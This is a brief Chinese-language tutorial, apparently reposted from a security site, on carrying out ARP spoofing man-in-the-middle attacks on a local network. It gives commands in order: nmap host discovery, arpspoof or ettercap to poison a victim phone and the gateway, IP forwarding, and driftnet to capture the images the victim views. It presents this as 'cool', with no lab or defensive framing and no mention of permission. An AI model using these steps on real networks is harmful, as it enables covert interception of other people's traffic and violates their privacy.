Arpspoof工具进行ARP欺骗

→1、先探测一下局域网的活动主机nmap –sS –PR 192.168.0.0/24

→2、打开一个终端,针对其中的一个IP  Arpspoof –i wlan0 –t 192.168.0.105 192.168.0.1 ，使目标流量经过自己的网卡

192.168.0.1网关的IP地址。

192.168.0.105是被攻击主机的IP（这里是一台手机）。

→3、打开另一个终端echo  1>/proc/sys/net/ipv4/ip_forward 进行IP流量转发

192.168.0.1网关的IP地址。

192.168.0.110是攻击主机的IP地址。

→4、再打开一个终端，driftnet –i wlan0

然后就可以中间人监听了，被攻击者（手机）打开一张图片时，攻击者就能看到被攻击手机打开的图片，是不是很酷。

使用ettercap进行ARP中间人攻击

→1、先探测一下局域网活动的主机nmap  -sN –PR 192.168.0.0/24

→2、对被攻击主机进行ARP欺骗 ettercap  -i  wlan0 -Tq  -M arp:remote/192.168.0.106// 192.168.0.1//

192.168.0.106被攻击主机IP地址

192.168.0.1 网关地址

→3、监听wlan0   driftnet –i wlan0

[出自:jiwo.org]

Driftnet –I wlan0 –a –d ./

-a表示后台运行，保存到指定目录下

-d指定目录